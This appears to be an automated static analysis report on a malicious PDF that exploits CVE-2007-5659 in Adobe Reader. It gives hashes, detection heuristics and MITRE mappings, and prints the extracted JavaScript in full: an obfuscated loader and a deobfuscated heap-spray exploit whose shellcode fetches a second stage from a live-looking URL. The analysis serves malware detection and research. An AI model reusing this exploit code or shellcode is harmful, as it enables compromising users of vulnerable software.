Malicious PDF — malware analysis report

Static analysis result for SHA-256 895c43ed1888db67…

MALICIOUS

PDF

4.8 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2012-07-06
MD5: 3defa02cdc7a235b9a63657162c91ec7 SHA-1: 91238535b957ecf5e1a17186b9860dd1ab01f016 SHA-256: 895c43ed1888db67658b257cfe4ef995df74b2d429b17afc82b0bc9fc68594d7
290 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF sample contains embedded JavaScript that exploits CVE-2007-5659 (Collab.collectEmailInfo) in Adobe Reader. The deobfuscated JavaScript contains a URL, http://seotraff.biz/qwe/load.php?id=2871&spl=4, which is likely used to download and execute a second-stage payload. The critical heuristics for PDF JavaScript exploit cluster and CVE-2007-5659 confirm the exploit nature of the script.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://seotraff.biz/qwe/load.php?id=2871&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x36B 6696 bytes
SHA-256: 729640935883daf45592be1ca2d849c8736f0a6493d2f0ffc8315f64cf7cb1a1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function WKVFzCwcJodPa(){eval("function im"+"p"+"lo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function g2bqSTno(CEUqo1y){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(CEUqo1y)"+";"+"}");eval("function s0TU6(nuq6M){var z1lq1CrMx="+"0,SFKZPUyWm=nuq6M.l"+"en"+"gth,RFh6KzKFsPO=10"+"2"+"4,WTCyO34lnY189,B7xOSbdAhy0,d2RcNK7='',bUbMGOvH=z1lq1CrMx,bh9Af=z1lq1CrMx,AGBoy0xzNzQ=z1lq1CrMx,tl8w5cXQ=Ar"+"ra"+"y(63,14,54,11,34,19,31,3,43,0,0,0,0,0,0,0,10,42,1,27,39,20,32,45,5,55,53,16,46,48,2,37,50,26,7,12,22,62,58,30,17,35,18,0,0,0,0,33,0,41,36,40,29,28,6,44,38,51,4,21,49,61,23,60,57,8,15,47,24,13,56,59,25,52,9);f"+"o"+"r(B7xOSbdAhy0=M"+"at"+"h.c"+"ei"+"l(SFKZPUyWm/"+"RFh6KzKFsPO)"+";B7xOSbdAhy0>z1lq1CrMx;B7xOSbdAhy0-"+"-){fo"+"r(WTCyO34lnY189=Ma"+"th.m"+"in(SFKZPUyWm,RFh6KzKFsPO);WTCyO34lnY189>z1lq1CrMx;WTCyO34lnY189-"+"-,SFKZPUyWm-"+"-){AGBoy0xzNzQ|"+"=(tl8w5cXQ[nuq6M.cha"+"rCod"+"eAt(bUbMGOvH+"+"+)-48])<"+"<bh9Af;if(bh9Af){d2RcNK7+"+"=g2bqSTno"+"(225^AGBoy0xzNzQ&"+"2"+"5"+"5);AGBoy0xzNzQ>"+">="+"8;bh9Af-"+"="+"2;}el"+"se{bh9Af="+"6"+";}}"+"}return (d2RcNK7);}var nL0SPraaW9EnJ3=implode('',['B6zF5fSLC@','@auT3GZVVL1NvyBidMrZc','OB7Vb5NqhzYg2B6q','Or','@tO','qVv','YBnwg','TVQYPZtYj','1tP9f3yg','NugD','Lx_JAt2x@tiBR3gnY3ON','Lzb','5IqP','B','8xMThq4uZt','Mz','7','tg','Ki@yMWVhHT8','4xD','aFrIq_','rQtOz','LoydR','3gnY3O','NL','z','b5IqPQNtgK','i@yMWVhHT84xDaF','B8','SIB7tgKi@yMWVhHT84xD','aFQixM','9f3ygNugDLx_','JA','t2','x@','tMeRSFlN','u8K7w','aCTtG@hdhNUgb','E1cbk1z','4','rQtPX','IegMWuLE','@v','hK1d','Y1ruPQRobjT','zO5Ut','M9','f3yg','Nu','gDLx_J','At2x@','c','2Bi','x','MRZp','YNTz41U','tM7QCha','ZzOfZx','Af2QPqRgh','B6zF5fe','aCNugTY','xJNW3GqfSIBRdhX3tyNfG','FX3c2B6z','F','5fg','gATmaGf','zL5RSI','B5pY','j@aF','9fz_zrSlETGyk3ulETGy','k3ulETG','y','k','3ul','Ef','mab1@l','E@GyE','r','@lE','WmJ44ulEhdyY4ul','Ehd','yX7ul','EZ','VaZ3ulEZ','Vy','k3u','lEZ','VcDN@lEZQ2X','5ulE','WVab@@lEWVaDW','@lEhmcT6@lE','TVak5','@','lEZVa','bW@lEW','dJbW@lEZA','y','F','W','@lE4ma','nn','ul','ETmyD@ulE4man','nulEWuabQulEZVaX3','ulEZVa','b1@','lEWd','JbW@l','E1','@','2X','3ulEWuyx','C','ulE','Z@','y','FNulEf','GJX3ul','EZVaK','7ul','EZV','abW@lEN@cn6ulE1@2','b1@l','EQ','G','JxCulE','W','uJK7ulE','fGJ','bNulEZVaK6','@','lEZVab','W@lEN@cn6','ulE','1@2','bQulE@@cxCu','lEN','dyE','6@lEfG','J','5n@lEZV','aXn@lE','ZVabW@lEN@cn6u','lE1@2b@ulEf','dyx','C','ulE','fma57u','lEf','GJx6@lEZ','VaZ','r@','lEZVa','bW','@lEN','@','cn6ulE1@2DW@','lE1uaxCulEfuct6ul','EfGJECulEZVa5Y','ulEZVabW','@','lE','N@cn6ul','ENVa','D1','@lET','AJn6@lE4uc53','@lE','WmJK5ulEWAJ','FN@lEZQ2X6','ulEZVabZ@lE1@ybW@lE4ucn6','ulE','WdJ41','@lE','ZV','cFN@lEZ@ax','5ulEWdJ','YW','ulEWAJ','Y','N@lEf','G','JY4ulEZVan','nulEZV','abW@lE','hGJYW@lEW','@JO4ulE','4','ma4f','ulEQd2XCu','lEZV','abW','@lEWmJbW@lEWAyFN@','lE1uc','n','nulE1man3@lE','WmJYW@lE@VaFN@l','ENdyxCu','lEZVabW@lE1VabW@lEN@c','nn','ulEhuJ','D1@lE1VJb','T@l','E','1@','cnnulEfGJDQulEZVa','x','5@lEZV','abW','@lE','N@cb@@lE1d24W@lE1Ay','b','W@lE@@yt7','ul','E1d2x7@lEZ','VcFW@lEhuctCulE','Z','Va','bW@lE4ucK','RulEWdJ4W@lEZ','AyFN@lEZ@','a','x5ulE','WdJY','Wul','EWAJY','N@lENVaXCulEZVabW@lEhuJbW@lE1','A','JbhulEN@cb@@lETAc41','@lE1AcZnulENdyY@','@lE@','V','at','7@l','E','1AcYW@lEN@cnnu','lE','huJD@ulE1V','JbN@lE1@cnnulEfGJ','DQulEZVa4@@lEZVabW@lEZVax5ulE4','ucKRulEWdJ4','W@lEZAJFN@lE','ZQa','x5ulE','W','dJYWulEWAJYN@lE','WV','a','XCulEZ','VabW','@lEh','uJbW@','l','EWd','JK','R','ulEW','VaFN@lEZ@ax5','ulEWdJYWulEWAJYN@lEZVaXCulE','ZVab','W@lEN@ab','W','@lE1QaY','Tul','Ef','uab@@lEfuab@@lEfu','ab@@lEfuab','@','@lEfGyn3','@lE1@Jb1@lEWdJ','Y@@','lEfdaZ','5u','lE1Q','aK','Dul','EfmaKRu','lEWd','JY','N@','lEWd','JX3ul','EZAJtr','ulE1V','ynnulE1@2','b','@ulE4','Gc','nn','ulEWd','JO','@','u','l','EW@ytr@','lEZActCulE1@2K3@','lE4u2nnulE','ZA','c4W@lETAcK3','@lENVJ','56ulET','myFZ@l','E1Gc','b@@lET','AcY4','ulE','ZQyKYulEWVaE7','ulE','NdaOZulEZAJ','tr@lE1','uy5','5@lEZAc','b','1ulENVaK','n@','lENu','aXnu','lENuyOT','ulE','4ucYNulE1@J','X','7@lEfdJnnu','lE1@Jnn','ul','EZAc4','1@lE
... (truncated)
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x36B 2711 bytes
SHA-256: 3fb3e42b43e4494073bda8b15408400f01a2ed7bb97294a757c77a30941a0186
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var YzCElTUsOZoa2 = new Array(); function TRwOlSeleb(aP1M1QFzdTk8xc, PQ6Yuczq2l) { while (aP1M1QFzdTk8xc.length*2<PQ6Yuczq2l){aP1M1QFzdTk8xc += aP1M1QFzdTk8xc;} aP1M1QFzdTk8xc = aP1M1QFzdTk8xc.substring(0,PQ6Yuczq2l/2); return aP1M1QFzdTk8xc; } function bWxHuuguHgL() { var Dz1Q7y4cVUi = 0x0c0c0c0c; var SK4FLpY2 = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u732F%u6F65%u7274%u6661%u2E66%u6962%u2F7A%u7771%u2F65%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3832%u3137%u7326%u6C70%u343D"); var pFmcDpFjJx = 0x400000; var YHqxdgWf33yJ = SK4FLpY2.length * 2; var PQ6Yuczq2l = pFmcDpFjJx - (YHqxdgWf33yJ+0x38); var aP1M1QFzdTk8xc = unescape("%u9090%u9090"); aP1M1QFzdTk8xc = TRwOlSeleb(aP1M1QFzdTk8xc, PQ6Yuczq2l); var gUBe3Q1YgmBtcQ = (Dz1Q7y4cVUi - 0x400000)/pFmcDpFjJx; for (var SJGQzBifXF=0;SJGQzBifXF<gUBe3Q1YgmBtcQ;SJGQzBifXF++) { YzCElTUsOZoa2[SJGQzBifXF] = aP1M1QFzdTk8xc + SK4FLpY2; } } function QNQdfHbJx8z1Ay() { var ewooaqFaOvN = app.viewerVersion.toString(); ewooaqFaOvN = ewooaqFaOvN.replace(/\D/g,""); var Pz2SvPsY50AO8 = new Array(ewooaqFaOvN.charAt(0),ewooaqFaOvN.charAt(1),ewooaqFaOvN.charAt(2)); if ((Pz2SvPsY50AO8[0] == 8 && ((Pz2SvPsY50AO8[1] == 1 && Pz2SvPsY50AO8[2] < 2) || Pz2SvPsY50AO8[1] < 1)) || (Pz2SvPsY50AO8[0] == 7 && Pz2SvPsY50AO8[1] < 1) || (Pz2SvPsY50AO8[0] < 7)) { bWxHuuguHgL(); var v8SLQ6HE = unescape("%u0c0c%u0c0c"); while(v8SLQ6HE.length < 44952) v8SLQ6HE += v8SLQ6HE; this.collabStore = Collab.collectEmailInfo({subj: "",msg: v8SLQ6HE}); } } QNQdfHbJx8z1Ay();

Open this report in the interactive analyzer, or submit your own file for analysis.